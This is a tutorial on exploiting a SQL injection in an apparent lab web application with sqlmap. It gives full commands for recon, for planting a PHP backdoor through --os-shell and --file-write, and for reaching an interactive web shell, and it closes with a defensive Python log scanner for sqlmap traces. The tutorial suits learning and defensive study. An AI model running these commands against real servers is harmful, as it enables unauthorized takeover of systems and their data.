Upload Web Shell with SQLmap

In this tutorial, we are going to learn how to upload a web shell using SQLmap. SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Find SQL injection point

In this scenario, I used a vulnerable web application that allows users to search products by entering a product name in the search field. Let's check if this web application is vulnerable to SQL injection.

Here, I'm going to use the Burp tool to capture the web application request. This application has a search function that queries the database with the product name given in the "productName=" parameter and returns product information from the database. If I put productName=' into the parameter, it will return some SQL error message from the web server. This is the most straightforward method to find a SQL injection vulnerability in a web application.

Recon with SQLmap

Now that we have found a SQL injection vulnerability in our web application, we can move on to SQLmap. First, we need to identify what information can help with our attack, for example the user name of the current database, the permissions of the current database user, the absolute path of the website, and other information.

The SQLmap command to view the current database user is as follows:

    sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --current-user

The above image shows that the user of the current database is "manager@localhost". Then we can run the following command to check the database user's permissions.

    sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --privileges

We can observe from the above image that the current database user has file permissions to manage system files. 

Upload files with SQLmap

Step 1:

SQLmap also allows users to upload web backdoors. In this step, I used the --os-shell option to upload the web shell to the web server.

Enter the following command in the terminal, and sqlmap will let us choose the settings:

    sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --dbs --os-shell

As shown in the figure below, we have to choose [4] PHP as the script language and [4] Brute force search for the writable directory. If you know the absolute directory path, you can select [2].

Finally, we can see something interesting: a backdoor and file stager were successfully uploaded to http://10.10.10.169/tmpuzbio.php. So, all we have to do is go to the URL, and it will give us the PHP backdoor as a file uploader.

Step 2:

In this stage, we will upload our web shell using the file-write method. We can write a file by entering the following command:

Note: --file-write is the absolute path of the web shell file on the local machine; --file-dest is the absolute path it is written to on the target machine.

    sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --dbs --file-write=/home/ukmihiran/Desktop/w.php --file-dest=C:/inetpub/wwwroot/w.php --batch

From the sqlmap prompt message below, we can see that the web shell was written successfully.

Now you can go to the given URL and it will give an interactive web shell. 😎
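
Seen from the server side, the steps above leave traces in the web server's access log. The following Python sketch is an added example, not code from the original post or from sqlmap: it flags requests that carry sqlmap's default User-Agent or that fetch a stager-style file, and groups the hits by client IP. It assumes Apache combined log format and generalises the stager name shown above (tmpuzbio.php) into a pattern; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Rule name -> pattern, matched against the URL-decoded log line.
RULES = {
    # Assumption: generalises the stager name on this page (tmpuzbio.php) to
    # "tmpu"/"tmpb" + 4 lowercase letters; adjust to what you observe.
    "stager_file": re.compile(r"/tmp[ub][a-z]{4}\.php\b"),
    # sqlmap's default User-Agent starts with "sqlmap/" unless overridden.
    "sqlmap_user_agent": re.compile(r'"sqlmap/[^"]*"\s*$'),
}

def classify(line):
    """Return the sorted rule names that match one access-log line."""
    decoded = unquote(line)  # catches percent-encoded file names too
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(lines):
    """Return (line_number, client_ip, rules) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        rules = classify(line)
        if rules:
            hits.append((n, line.split(" ", 1)[0], rules))
    return hits

def suspects(lines):
    """Map client IP -> set of rules it triggered (both = scan, then upload)."""
    seen = {}
    for _, ip, rules in scan(lines):
        seen.setdefault(ip, set()).update(rules)
    return seen

# Constructed sample in Apache combined log format (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "POST /search_products.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [01/Jan/2024:10:02:13 +0000] "POST /search_products.php HTTP/1.1" 200 498 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.66 - - [01/Jan/2024:10:06:02 +0000] "GET /tmpuzbio.php HTTP/1.1" 200 730 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:07:00 +0000] "GET /tmp/report.php HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, ip, rules in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {', '.join(rules)}")
```

A client IP that triggers both rules has most likely gone from scanning to a successful upload, so the web root should be checked for files the application did not ship.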
